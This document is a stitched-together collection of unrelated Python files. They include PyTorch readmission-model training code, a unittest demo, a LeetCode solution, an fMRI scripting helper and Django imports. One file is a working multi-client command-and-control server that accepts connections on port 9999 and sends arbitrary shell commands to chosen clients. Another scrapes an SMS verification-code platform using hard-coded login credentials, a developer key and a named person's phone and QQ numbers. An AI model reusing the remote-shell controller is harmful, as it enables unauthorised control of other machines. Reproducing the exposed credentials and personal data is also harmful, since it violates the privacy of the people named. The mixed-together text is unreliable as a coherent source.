token_list.append((uid, label, tokens))
line = f.readline()
if len(token_list) == nrows:
break
if vocab is None:
log("Build counter")
counter = Counter()
if pos_labs_vocab:
for uid, label, tokens in token_list:
if label:
counter.update(tokens)
else:
for uid, label, tokens in token_list:
counter.update(tokens)
log("Build vocab")
vocab = Vocab(counter, min_freq=min_freq, specials=["<pad>", "<unk>"])
log("Build data")
data = [
(pid, torch.tensor([label]), torch.tensor([vocab.stoi[t] for t in tokens]))
for pid, label, tokens in token_list
]
labels = set(["readmission"])
log("Build pytorch dataset")
log(f"Skipped {invalid_uid} invalid patients")
log(f"Skipped {deaths} dead patients")
dataset = text_classification.TextClassificationDataset(vocab, data, labels)
log("Done")
return dataset
def epoch_train_lstm(
model,
dataloader,
optimizer,
criterion,
test=0
):
"""
Train model for an epoch, called by ModelProcess function
detach_hidden is used to detach hidden state between batches,
and will add a new hidden state to model. Model must have .init_hidden function defined
Args:
-----
model (nn.Module): lstm general attention model
dataloader : iterator for dataset, yields (ids, sequence, seq length, labels)
criterion : loss function
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
Returns:
----------
tuple containing:
average loss for whole epoch,
average AUC for whole epoch
"""
import copy
from sklearn.metrics import roc_auc_score
def repackage_hidden(h):
"""
Wraps hidden states in new Tensors, to detach them from their history.
Needed to prevent RNN+Attention backpropagating between batches.
"""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
epoch_loss = 0
epoch_metric = 0
model.train()
# initialize lists to compare predictions & ground truth labels for metric calculation
order_labels = []
prediction_scores = []
if test: # test function on small number of batches
counter = 0
for idx, (ids, text, text_lengths, labels) in enumerate(dataloader):
optimizer.zero_grad()
hidden = model.init_hidden(text.shape[0])
hidden = repackage_hidden(hidden)
text, text_lengths, labels = (
text.to(model.device),
text_lengths,
labels.to(model.device),
)
predictions, hidden = model(text, text_lengths, hidden)
#predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, labels.type_as(predictions))
loss.backward()
optimizer.step()
# prevent internal pytorch timeout due to too many file opens by multiprocessing
copied_labels = copy.deepcopy(labels.detach().cpu().numpy())
del labels
order_labels.extend(copied_labels)
copied_preds = copy.deepcopy(predictions.detach().cpu().numpy())
del predictions
prediction_scores.extend(copied_preds)
epoch_loss += loss.item()
if test:
if counter >= test:
break
counter += 1
epoch_metric = roc_auc_score(order_labels, torch.sigmoid(torch.Tensor(prediction_scores)))
return epoch_loss / len(dataloader), epoch_metric
def epoch_val_lstm(
model, dataloader, criterion, return_preds=False, test=0, max_len=1000
):
"""
Evaluate model on a dataset
Args:
model : any pytorch model with defined forward
dataloader : iterator for dataset, yields (ids, sequence, seq length, labels)
criterion: loss function
device: cpu or gpu
return_preds : bool default False
If enabled, returns (ids, predictions, labels, attn, events)
detach_hidden : bool default False
Set to true if AttentionRNN is used
Model must have .init_hidden function defined
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
max_len (int) : maximum length for attention
Returns:
tuple containing:
average loss for whole epoch,
average AUC for whole epoch
if return_preds is enabled, also returns additional tuple:
ids,
predictions
labels
attn,
events
"""
import copy
from sklearn.metrics import roc_auc_score
def repackage_hidden(h):
"""
Wraps hidden states in new Tensors, to detach them from their history.
Needed to prevent RNN+Attention backpropagating between batches.
"""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
def detach_and_copy(val):
copied = copy.deepcopy(val.detach().cpu().numpy())
del val
return copied
epoch_loss = 0
epoch_acc = 0
model.eval()
# initialize lists to compare predictions & ground truth labels for metric calculation
order_labels = []
prediction_scores = []
if return_preds:
ids_lst = []
attn = [None] * len(dataloader)
feat = [None] * len(dataloader)
if test: # test function on small number of batches
counter = 0
with torch.no_grad():
for idx, (ids, text, text_lengths, labels) in enumerate(dataloader):
text, text_lengths, labels = (
text.to(model.device),
text_lengths,
labels.to(model.device),
)
hidden = model.init_hidden(text.shape[0])
hidden = repackage_hidden(hidden)
predictions, hidden, attn_weights = model(
text, text_lengths, hidden, explain=True
)
loss = criterion(predictions, labels.type_as(predictions))
epoch_loss += loss.item()
# prevent internal pytorch timeout due to too many file opens by multiprocessing
order_labels.extend(detach_and_copy(labels))
prediction_scores.extend(detach_and_copy(predictions))
if return_preds:
ids_lst.extend(copy.deepcopy(ids))
attn[idx] = detach_and_copy(attn_weights)
feat[idx] = detach_and_copy(text)
epoch_loss += loss.item()
if test:
if counter >= test:
break
counter += 1
epoch_metric = roc_auc_score(order_labels, torch.sigmoid(torch.Tensor(prediction_scores)))
return_tuple = (epoch_loss / len(dataloader), epoch_metric)
if return_preds:
#print(len(attn))
#print(attn)
# return sizing not always consistent: ensure same dimensions and length
attn = [
np.squeeze(cur_attn, 2) if len(cur_attn.shape) == 3 else cur_attn
for cur_attn in attn
]
attn = [
np.concatenate( # append with zeros
(
cur_attn,
np.zeros(
(cur_attn.shape[0], abs(cur_attn.shape[1] - 1000))
),
),
1,
)
if cur_attn.shape[1] != 1000
else cur_attn
for cur_attn in attn
]
attn = np.concatenate(attn)
feat = [
np.concatenate(
(cur_feat,
np.zeros(
(cur_feat.shape[0], abs(cur_feat.shape[1] - 1000)))
), 1
)
if cur_feat.shape[1] != 1000
else cur_feat
for cur_feat in feat
]
feat = np.concatenate(feat)
return_tuple = return_tuple + ((ids_lst, prediction_scores, order_labels, attn, feat),)
return return_tuple
def epoch_val_lstm_v2(
model, dataloader, criterion, return_preds=False, test=0, max_len=1000
):
"""
Evaluate model on a dataset
Args:
model : any pytorch model with defined forward
dataloader : iterator for dataset, yields (ids, sequence, seq length, labels)
criterion: loss function
device: cpu or gpu
return_preds : bool default False
If enabled, returns (ids, predictions, labels, attn, events)
detach_hidden : bool default False
Set to true if AttentionRNN is used
Model must have .init_hidden function defined
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
max_len (int) : maximum length for attention
Returns:
tuple containing:
average loss for whole epoch,
average AUC for whole epoch
if return_preds is enabled, also returns additional tuple:
ids,
predictions
labels
attn,
events
"""
import copy
from sklearn.metrics import roc_auc_score
def repackage_hidden(h):
"""
Wraps hidden states in new Tensors, to detach them from their history.
Needed to prevent RNN+Attention backpropagating between batches.
"""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
def detach_and_copy(val):
copied = copy.deepcopy(val.detach().cpu().numpy())
del val
return copied
epoch_loss = 0
epoch_acc = 0
model.eval()
# initialize lists to compare predictions & ground truth labels for metric calculation
order_labels = []
prediction_scores = []
if return_preds:
ids_lst = []
attn = [None] * len(dataloader)
feat = [None] * len(dataloader)
if test: # test function on small number of batches
counter = 0
with torch.no_grad():
for idx, (ids, text, text_lengths, labels) in enumerate(dataloader):
text, text_lengths, labels = (
text.to(model.device),
text_lengths,
labels.to(model.device),
)
#hidden = model.init_hidden(text.shape[0])
#hidden = repackage_hidden(hidden)
predictions, hidden, attn_weights = model(
text, text_lengths, text.shape[0], explain=True
)
loss = criterion(predictions, labels.type_as(predictions))
epoch_loss += loss.item()
# prevent internal pytorch timeout due to too many file opens by multiprocessing
order_labels.extend(detach_and_copy(labels))
prediction_scores.extend(detach_and_copy(predictions))
if return_preds:
ids_lst.extend(copy.deepcopy(ids))
attn[idx] = detach_and_copy(attn_weights)
feat[idx] = detach_and_copy(text)
epoch_loss += loss.item()
if test:
if counter >= test:
break
counter += 1
epoch_metric = roc_auc_score(order_labels, torch.sigmoid(torch.Tensor(prediction_scores)))
return_tuple = (epoch_loss / len(dataloader), epoch_metric)
if return_preds:
#print(len(attn))
#print(attn)
# return sizing not always consistent: ensure same dimensions and length
attn = [
np.squeeze(cur_attn, 2) if len(cur_attn.shape) == 3 else cur_attn
for cur_attn in attn
]
attn = [
np.concatenate( # append with zeros
(
cur_attn,
np.zeros(
(cur_attn.shape[0], abs(cur_attn.shape[1] - 1000))
),
),
1,
)
if cur_attn.shape[1] != 1000
else cur_attn
for cur_attn in attn
]
attn = np.concatenate(attn)
feat = [
np.concatenate(
(cur_feat,
np.zeros(
(cur_feat.shape[0], abs(cur_feat.shape[1] - 1000)))
), 1
)
if cur_feat.shape[1] != 1000
else cur_feat
for cur_feat in feat
]
feat = np.concatenate(feat)
return_tuple = return_tuple + ((ids_lst, prediction_scores, order_labels, attn, feat),)
return return_tuple
def get_average_accuracy(preds, y):
"""
Returns accuracy, i.e. if you get 8/10 right, this returns 0.8, NOT 8
Averaged between all the classes, if num_class > 1
Args:
preds (torch.Tensor): predictions from model
y (torch.Tensor): correct labels
Returns:
float: calculated accuracy
"""
num_class = preds.shape[1] if preds.dim() == 2 else preds.dim()
acc = ((preds > 0) == (y == 1)).sum().item() / num_class
acc /= len(preds)
return acc
def get_individual_acc(preds, y):
"""
Calculates accuracy for each class and return a list of
accuracy for each of the class in corresponding order.
Assumes multiple classes are available
Args:
preds (torch.Tensor): predictions from model
y (torch.Tensor): correct labels
Returns:
list: calculated accuracy
"""
num_class = preds.shape[1]
acc_lst = [None] * num_class
for idx in range(num_class):
acc_lst[idx] = get_average_accuracy(preds[:, idx], y[:, idx])
return acc_lst
def evaluate(model, iterator, criterion, device, return_preds=False, detach_hidden=False, batch_size=0):
"""
Evaluate model on a dataset
Args:
model : any pytorch model with defined forward
iterator : iterator for dataset, yields (sequence, seq length, labels)
criterion: loss function
device: cpu or gpu
return_preds : bool default False
If enabled, returns predictions labels
detach_hidden : bool default False
Set to true if AttentionRNN is used
Model must have .init_hidden function defined
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
Returns:
tuple containing:
average loss for whole epoch,
average accuracy for whole epoch
if return_preds is enabled, also returns:
predictions
labels
"""
epoch_loss = 0
epoch_acc = 0
model.eval()
if return_preds:
preds = [None] * len(iterator)
y = [None] * len(iterator)
with torch.no_grad():
for idx, (ids, text, text_lengths, labels) in enumerate(iterator):
text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
if detach_hidden:
hidden = model.init_hidden(batch_size)
hidden = repackage_hidden(hidden)
predictions, hidden = model(text, text_lengths, hidden)
else:
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, labels.type_as(predictions))
acc = get_average_accuracy(predictions, labels)
if return_preds:
preds[idx] = predictions
y[idx] = labels
epoch_loss += loss.item()
epoch_acc += acc
if return_preds:
return epoch_loss / len(iterator), epoch_acc / len(iterator), torch.cat(preds), torch.cat(y)
return epoch_loss / len(iterator), epoch_acc / len(iterator)
def evaluate_explain(model, iterator, criterion, device, return_preds=False,
detach_hidden=False, batch_size=0, explain=False,
max_length=1000):
"""
Evaluate model on a dataset
Args:
model : any pytorch model with defined forward
iterator : iterator for dataset, yields (sequence, seq length, labels)
criterion: loss function
device: cpu or gpu
return_preds : bool default False
If enabled, returns predictions labels
detach_hidden : bool default False
Set to true if AttentionRNN is used
Model must have .init_hidden function defined
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
Returns:
tuple containing:
average loss for whole epoch,
average accuracy for whole epoch
if return_preds is enabled, also returns:
predictions
labels
"""
epoch_loss = 0
epoch_acc = 0
model.eval()
if return_preds:
preds = [None] * len(iterator)
y = [None] * len(iterator)
if explain:
attn = [None] * len(iterator)
feat = [None] * len(iterator)
with torch.no_grad():
for idx, (text, text_lengths, labels) in enumerate(iterator):
#if text.size()[1] < 1000:
# delta_text = abs(text.size()[1]-1000)
# text = torch.cat((text, torch.zeros((text.size()[0], delta_text), dtype=text.dtype)), 1)
# print(text.size())
text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
if detach_hidden:
hidden = model.init_hidden(batch_size)
hidden = repackage_hidden(hidden)
if explain:
predictions, hidden, attn_weights = model(text, text_lengths, hidden, explain=True)
else:
predictions, hidden = model(text, text_lengths, hidden)
else:
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, labels.type_as(predictions))
acc = get_average_accuracy(predictions, labels)
if return_preds:
preds[idx] = predictions
y[idx] = labels
if explain:
attn[idx] = attn_weights
feat[idx] = text
epoch_loss += loss.item()
epoch_acc += acc
return_tuple = (epoch_loss / len(iterator), epoch_acc / len(iterator))
if return_preds:
return_tuple = return_tuple + (torch.cat(preds), torch.cat(y),)
if explain:
for idx, cur_attn in enumerate(attn):
if len(cur_attn.size())== 3:
cur_attn = cur_attn.squeeze(2)
attn[idx]= cur_attn
if cur_attn.size()[1] != max_length:
delta_text = abs(cur_attn.size()[1]-max_length)
cur_attn = cur_attn.cpu()
attn[idx] = torch.cat((cur_attn, torch.zeros((cur_attn.size()[0], delta_text), dtype=cur_attn.dtype)), 1).to(device)
for idx, cur_feat in enumerate(feat):
if cur_feat.size()[1] != max_length:
delta_text = abs(cur_feat.size()[1]-max_length)
cur_feat = cur_feat.cpu()
#print(cur_feat.size())
feat[idx] = torch.cat((cur_feat, torch.zeros((cur_feat.size()[0], delta_text), dtype=cur_feat.dtype)), 1).to(device)
return_tuple = return_tuple + (torch.cat(attn), torch.cat(feat), )
#print(len(return_tuple))
return return_tuple
def train_pos_neg(model, pos_iterator, neg_iterator, optimizer, criterion, device,
detach_hidden=False, batch_size=0,
metric='acc'):
"""
Train model for an epoch.
Args:
model (nn.Module): any pytorch model with defined forward
iterator : iterator for dataset, yields (sequence, seq length, labels)
criterion : loss function
device : cpu or gpu
detach_hidden : bool default False
Used to detach hidden state between batches,
and will add a new hidden state to model
Model must have .init_hidden function defined
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
Returns:
tuple containing:
average loss for whole epoch,
average accuracy for whole epoch
"""
epoch_loss = 0
epoch_metric = 0
model.train()
for idx, ((pos_text, pos_text_lengths, pos_labels), (neg_text, neg_text_lengths, neg_labels)) in enumerate(zip(pos_iterator, neg_iterator)):
text = torch.cat((pos_text, neg_text))
text_lengths = torch.cat((pos_text_lengths, neg_text_lengths))
labels = torch.cat((pos_labels, neg_labels))
optimizer.zero_grad()
if detach_hidden:
if batch_size == 0:
raise ValueError('Batch_size in training needs to number with detach_hidden')
hidden = model.init_hidden(batch_size)
hidden = repackage_hidden(hidden)
text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
if detach_hidden:
predictions, hidden = model(text, text_lengths, hidden)
else:
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, labels.type_as(predictions))
loss.backward()
optimizer.step()
if metric == 'acc':
batch_metric = get_average_accuracy(predictions, labels)
else:
batch_metric = metrics.compute_single_metric(labels.cpu().numpy(), predictions.detach().cpu().numpy())
epoch_loss += loss.item()
epoch_metric += batch_metric
return epoch_loss / len(iterator), epoch_metric / len(iterator)
##### OLD CODE
def build_text_dataset(df, feat_colnames, label_colnames, vocab=None, min_freq=1):
"""
Build pytorch text classification dataset.
Args:
df (dataframe): contains both features and labels
feat_colnames (list): columns that the sequence resides in
label_colnames (list): columns that contains labeling information
vocab (Vocab): vocabulary to be used with this dataset.
default None, which function will build vocabulary
based on words in df[feat_colnames]
min_freq (int): minimum frequency to use for building vocabulary
only used if need to build vocabulary
Returns:
(TextClassificationDataset)
"""
def create_tuple(labels, features, vocab):
try:
sentence = [x for x in features if str(x).lower() != 'nan']
sentence = torch.tensor([vocab.stoi[x] if x in vocab.stoi.keys() else vocab.stoi['<unk>'] for x in sentence])
return (torch.tensor(labels), sentence)
except Exception as excpt:
print(sentence)
print(excpt)
raise ValueError
else:
return vocab
if vocab is None:
counter = Counter()
words = df[feat_colnames].values.ravel('K')
words = [str(x) for x in words if str(x).lower() != 'nan']
counter.update(words)
if not isinstance(min_freq, numbers.Number):
raise ValueError(f'Something wrong with {min_freq}')
vocab = Vocab(counter, min_freq=min_freq, specials=['<pad>', '<unk>'])
print('Completed vocabulary')
else:
print('Vocab already supplied')
# create dataset
data = df.apply(
lambda row: create_tuple(row[label_colnames],
row[feat_colnames],
vocab), axis=1)
labels = set(df[label_colnames])
new_dataset = text_classification.TextClassificationDataset(vocab, data, labels)
print('New dataset created')
return new_dataset
def train(model, iterator, optimizer, criterion, device, detach_hidden=False, batch_size=0,
metric='acc'):
"""
Train model for an epoch.
Args:
model (nn.Module): any pytorch model with defined forward
iterator : iterator for dataset, yields (sequence, seq length, labels)
criterion : loss function
device : cpu or gpu
detach_hidden : bool default False
Used to detach hidden state between batches,
and will add a new hidden state to model
Model must have .init_hidden function defined
batch_size : int default 0
used when detach_hidden is enabled
to create the correct hidden sizes during initialization
Returns:
tuple containing:
average loss for whole epoch,
average accuracy for whole epoch
"""
epoch_loss = 0
epoch_metric = 0
model.train()
for idx, (ids, text, text_lengths, labels) in enumerate(iterator):
optimizer.zero_grad()
if detach_hidden:
if batch_size == 0:
raise ValueError('Batch_size in training needs to number with detach_hidden')
hidden = model.init_hidden(batch_size)
hidden = repackage_hidden(hidden)
text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
if detach_hidden:
predictions, hidden = model(text, text_lengths, hidden)
else:
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, labels.type_as(predictions))
loss.backward()
optimizer.step()
if metric == 'acc':
batch_metric = get_average_accuracy(predictions, labels)
else:
batch_metric = metrics.compute_single_metric(labels.cpu().numpy(), predictions.detach().cpu().numpy())
epoch_loss += loss.item()
epoch_metric += batch_metric
return epoch_loss / len(iterator), epoch_metric / len(iterator)
|
# --------------------------------------------------------------------
import doctest
import unittest
import os
import sys
# --------------------------------------------------------------------
def sq (x) -> int: # Doc string contains expected results. Reises exceptions when not met
'''
Calculates the square of the input number
>>> sq(0)
0
>>> sq (1)
1
>>> sq (10)
100
>>> sq (15)
225
'''
return x ** 2
# --------------------------------------------------------------------
class sqtest (unittest.TestCase): # Assertions
def testFunc (self): # Must start with "test" but the name itself can be arbitrary
self.assertEqual (sq (1), 1)
self.assertEqual (sq (5), 26) # Fails
self.assertFalse (sq (0))
if __name__ == "__main__":
doctest.testmod
os.system ("pause")
del sys.argv[1:] # Otherwise command line argumebts are treated as test cases!
unittest.main ()
os.system ("pause")
# --------------------------------------------------------------------
|
import socket
import sys
import threading
import time
from queue import Queue
Number_OF_THREADS=2
JOB_NUMBER=[1,2]
queue=Queue()
all_connection=[]
all_address=[]
def create_socket():
try:
global host
global port
global s
host=""
port = 9999
s=socket.socket()
except socket.error as mess:
print(str(mess))
def bind_socket():
try:
global host
global port
global s
s.bind((host,port))
s.listen(5)
except socket.error as mess:
print(mess)
bind_socket()
#handling connection from multiple client and saving in a list
def accepting_connections():
for i in all_connection:
i.close()
del all_connection[:]
del all_address[:]
while True:
try:
conn,addr=s.accept()
s.setblocking(1)#prevents time blocking
all_connection.append(conn)
all_address.append(addr)
print("connection has been establised:"+addr[0])
except:
print("Error")
#Interative shell
def start_turtle():
while True:
cmd=input("radeon$")
if cmd == 'list':
print(all_address)
list_connection()
elif 'select' in cmd:
conn=get_target(cmd)
if conn is not None:
send_command(conn)
else:
print("Command not recognised")
#display all the connection
def list_connection():
results=''
for i,c in enumerate(all_connection):
try:
print("trying")
c.send(str.encode("echo ter"))
c.recv(4096)
except:
print("except")
del all_connection[i]
del all_address[i]
continue
results=str(i)+" "+str(all_address[i][0])+" "+str(all_address[i][1]) + "\n"
print("-------CLIENTS------ " + " \n "+ results)
#select Conection
def get_target(cmd):
try:
target=cmd.replace('select ','')
target=int(target)
#a=all_address[target]
con=all_connection[target]
print("target_selected",all_address[target][0])
print(all_address[target][0],">",end="")
return con
except:
print("Selection not valid")
return None
#send command
def send_command(conn):
while True:
try:
ter=input()
if (ter =='quit'):
exit()
if (len(str.encode(ter))>0):
conn.send(str.encode(ter))
client_res=str(conn.recv(20480),'utf-8')
print(client_res,end="")
except:
print("Error in sending")
break
#creating thread
def create_worker():
for i in range(Number_OF_THREADS):
t=threading.Thread(target=work)
t.daemon =True
t.start()
def create_job():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
def work():
while True:
x=queue.get()
if (x==1):
create_socket()
bind_socket()
accepting_connections()
if (x==2):
start_turtle()
queue.task_done()
create_worker()
create_job()
|
"""
Time Complexity = O(N)
Space Complexity = O(1)
"""
class Solution:
def minCostToMoveChips(self, position: List[int]) -> int:
even = odd = 0
for i in position:
if i%2 == 0:
even += 1
else:
odd += 1
return min(odd, even) |
#!/usr/bin/python
#-*- coding: utf-8 -*-
'''
Created on 2017-04-07 15:17:55
@author: Maxing
'''
import requests
from requests.exceptions import ConnectionError
import time
import os
import sys
import json
import codecs
import logging
from utils import save_items, get_items_from_file, add_item_fields, log_init
reload(sys)
sys.setdefaultencoding('utf8')
# 基码(http://www.jima123.com/)
# 账号/密码: kkk321(kkk321)
# 登录后, token有效期为10分钟, 过期需要重新申请token
# 平台接口前缀: 'http://api.ltxin.com:8888'
'''
账户基本信息
account_info = {
'user_info': {
u'用户名': 'kkk321',
u'用户类别': '登堂入室',
u'最大登陆数量': '5',
u'最大取号数量': '10',
u'用户余额': '0.00',
u'暂冻余额': '0.00',
u'积分': '10.00',
u'真实姓名': '赵四',
u'联系电话': '18926779674',
u'开发者余额': '0.0000',
u'QQ': '1747485592',
}
u'Developer': 'yTVCJOLThoMGGJaQSqFImyv86Jnsx2vv',
}
'''
# 开发者参数
DEVELOPER = r'yTVCJOLThoMGGJaQSqFImyv86Jnsx2vv'
# API前缀
API_PREFIX = r'http://api.jima123.com/api.php'
# 保存网站项目信息的文件
ITEMS_FILE = os.path.sep.join([sys.path[0] , 'items', 'jima_items.json'])
# 保存最终获得的手机号码信息保存文件
current_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
PHONE_FILE = sys.path[0] + os.path.sep + 'data' + os.path.sep + 'jima_phone_%s.txt' % (current_date)
# LOG
month = time.strftime('%Y-%m', time.localtime(time.time()))
LOG_FILE = os.path.sep.join([sys.path[0], 'log', 'jima_%s.log' % month])
class Jima(object):
def __init__(self):
self.api_prefix = API_PREFIX
self.developer = DEVELOPER
self.user_name = 'kkk321'
self.user_pwd = 'kkk321'
self.token = ''
self.userid = '11744'
self.phone_list = ''
self.headers = {
'Host': 'api.jima123.com',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4',
}
log_name = self.__class__.__name__
log_init(log_name, LOG_FILE)
self.logger = logging.getLogger(log_name)
self.logger.info(u'开始采集' + '-'*30)
# 统一处理请求部分
def request(self, request_type, url, payload=None):
# request_type: 请求类型
# url: 请求地址
# payload: 请求参数
retry_time = 0
while 1:
try:
if request_type == 'post':
r = requests.post(url=url, headers=self.headers, data=payload, allow_redirects=False)
elif request_type == 'get':
r = requests.get(url=url, headers=self.headers, params=payload, allow_redirects=False)
r.encoding = 'gb2312'
if r.status_code == 200 and r.json().get('errno') in ['0','3059']:
return r.json()
elif r.status_code == 504:
time.sleep(5)
self.logger.info(str(r.status_code) + u'\t网关超时, 休眠5秒。')
else:
return
except ConnectionError:
self.logger.info(u'被对方服务器主动拒绝, 暂停30S。')
time.sleep(30)
except Exception, e:
self.logger.info(e)
return
# 登录, 获得用户token
def login(self):
payload = {
'act': 'login',
'username': self.user_name,
'password': self.user_pwd,
'developer': self.developer,
}
url = self.api_prefix
# 登录失败需要重试
while 1:
login_res_json = self.request('get', url, payload)
if login_res_json and login_res_json['errno'] == '0':
self.token = login_res_json['data'][0]['token'].strip()
self.userid = login_res_json['data'][0]['userid'].strip()
if self.token != '':
self.logger.info(u'登录成功!')
return
else:
self.logger.info(u'登录失败!重试中。。。')
time.sleep(1.5)
# 获取项目
def get_items(self):
# 项目类型:
# 0-收码
# 1-发码
# 4-多个收码
# 5-多个发码
payload = {
'act': 'gettask',
'userid': self.userid,
'token': self.token,
}
url = self.api_prefix
item_json = self.request('get', url, payload=payload)
if item_json and item_json['errno'] == '0':
self.logger.info(u'获取项目列表OK')
item_list = item_json['data']
items = []
for item in item_list:
item_dict = {}
item_dict['item_id'] = item['taskid']
item_dict['item_name'] = item['taskname']
item_dict['item_price'] = item['gold']
item_dict['item_type'] = item['type']
items.append(item_dict)
return items
# 获取区域
def get_area(self):
area_url = self.api_prefix
payload = {
'act': 'getarea',
'userid': self.userid,
'token': self.token,
}
area_res_json = self.request('get', area_url, payload)
area_list = area_res_json['data']
# 返回示例
# {"errno":"0","errmsg":"OK","data":[
# {"provinceid":"11","province":"\u5317\u4eac\u5e02"},
# {"provinceid":"12","province":"\u5929\u6d25\u5e02"}
# ]
# }
return area_list
# 获取号码
def get_num(self, item_id, count):
# item_id: 项目ID
# count: 获取手机号的数量
payload = {
'act': 'getmobile',
'userid': self.userid, # 用户ID 必填
'token': self.token, # 登录token 必填
'taskid': item_id, # 项目代码 必填
'mobile': '', # 指定手机号
'max': '', # 最大单价[项目最高价]
'min': '', # 最小单价[项目最低价]
'key': '', # 专属对接,与卡商直接对接
'count': str(count), # 获取数量(默认为1,最大为10)
'area': '', # 区域(不填则随机)
'operator': '', # 运营商(不填为0, [0-随机][1-移动][2-联通][3-电信])
}
url = self.api_prefix
num_json = self.request('get', url, payload)
nums = []
if num_json:
self.logger.info('errno is : %s' % (num_json['errno']))
if num_json['errno'] == '0':
nums = [mobile_data['mobile'] for mobile_data in num_json['data']]
add_str = '-%s;' % (item_id)
self.phone_list = add_str.join(nums) + add_str.strip(';')
elif num_json['errno'] == '3059':
self.logger.info(num_json['errmsg'])
return nums
# 释放号码
def release_phone(self):
url = self.api_prefix
payload = {
'act': 'resmobile',
'userid': self.userid,
'token': self.token,
'list': self.phone_list,
}
release_res_json = self.request('get', url, payload)
if release_res_json['errno'] == '0':
self.logger.info(u'释放号码成功!')
# 释放号码
def release_all_phone(self):
url = self.api_prefix
payload = {
'act': 'resall',
'userid': self.userid,
'token': self.token,
}
resall_res_json = self.request('get', url, payload)
if resall_res_json['errno'] == '0':
self.logger.info(u'释放所有号码成功!')
# 退出
def exit(self):
url = self.api_prefix
payload = {
'act': 'quit',
'userid': self.userid,
'token': self.token
}
exit_res_json = self.request('get', url, payload)
if exit_res_json['errno'] == '0':
self.logger.info(u'退出成功!')
def main():
jima = Jima()
jima.login()
if os.path.exists(ITEMS_FILE):
items = get_items_from_file(ITEMS_FILE)
jima.logger.info(u'从文件中读取__%s__网站可接收验证码项目%d个。' % (
str(jima.__class__).split('.')[1].strip("'>"), len(items)))
else:
items = jima.get_items()
save_items(items, ITEMS_FILE)
jima.logger.info(u'一共获取__%s__网站可接收验证码项目%d个。' % (
str(jima.__class__).split('.')[1].strip("'>"), len(items)))
for item in items:
# 每个项目拿10次
# 该网站会冻结账户
for i in xrange(10):
time.sleep(5.5)
item_name = item.get('item_name')
item_id = item.get('item_id')
item_price = float(item.get('item_price'))
item_type = item.get('item_type')
jima.logger.info(u'项目: __%s__, ID: __%s__, 价格: __%s__' % (item_name, item_id, item_price))
if item_id and item_price <= 10:
nums = jima.get_num(item_id, 10)
jima.logger.info(nums)
if len(nums) == 0:
jima.logger.info(u'没有获取到有效号码')
jima.exit()
jima.login()
continue
phone_items = []
for num in nums:
current_time = time.strftime(
'%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
phone_item = {
'item_name': item_name, # 项目名称
'item_id': item_id, # 项目ID
'crawl_time': current_time, # 采集时间
'item_price': item_price, # 项目价格
'item_type': item_type, # 项目类型
'phone': num, # 手机号
'portal': u'基码', # 来源门户
}
new_item = add_item_fields(phone_item)
phone_items.append(new_item)
save_items(phone_items, PHONE_FILE)
# 释放号码
jima.release_all_phone()
else:
jima.logger.info(u'项目价格超过10元, 放弃.')
# 释放号码
jima.exit()
# 重新登录, 刷新token
jima.login()
jima.logger.info(u'采集结束' + '-'*30)
if __name__ == '__main__':
main() |
#!/usr/bin/python
# This script generates templates for level 1 analysis performed after ICA-AROMA. Adapted from Jeanette Mumford.
import os
import glob
# Set this to the directory all of the sub### directories live in
studydir = '/Volumes/KATYA5GBA/HCP_Gambling_RESULTSevent'
# Set this to the directory where you'll dump all the fsf files
# May want to make it a separate directory, because you can delete them all once Feat runs
#os.system('mkdir %s/fsf_1stLev'%(studydir))
fsfdir='/Users/edobryakova/Documents/HCPgambling_templates/lev1_fsf'
# Get all the paths! Note, this won't do anything special to omit bad subjects
subdirs=glob.glob("%s/*/*[LR][RL]/ICA*"%(studydir))
for dir in list(subdirs):
splitdir = dir.split('/')
# YOU WILL NEED TO EDIT THIS TO GRAB sub001
splitdir_sub = splitdir[4]
subnum=splitdir_sub[:]
# YOU WILL ALSO NEED TO EDIT THIS TO GRAB THE PART WITH THE RUNNUM
splitdir_encoding = splitdir[5]
encoding=splitdir_encoding[15:]
#splitdir_list = splitdir[9]
print(subnum)
#targetPath = '%s/tfMRI_GAMBLING_LR.nii.gz'%(dir)
#if not os.path.isfile(targetPath):
# targetPath = '%s/tfMRI_GAMBLING_RL.nii.gz'%(dir)
ntime = os.popen('fslnvols %s/denoised_func_data_nonaggr.nii.gz'%(dir)).read().rstrip()
replacements = {'SUBNUM':subnum, 'NTPTS':ntime, 'ENCODING':encoding}
with open("/Users/edobryakova/Documents/HCPgambling_templates/lev1_template.fsf") as infile:
with open("%s/lev1_ER_%s_%s.fsf"%(fsfdir, subnum, splitdir_encoding), 'w') as outfile:
for line in infile:
for src, target in replacements.items():
line = line.replace(src, target)
outfile.write(line)
#this will launch all feats at once
#os.system("feat %s/preprocER_%s_%s.fsf"%(fsfdir, subnum, splitdir_encoding))
|
from django.shortcuts import render
from django.http import HttpResponse
from .models import Detail
from .serializers import Detailserializers
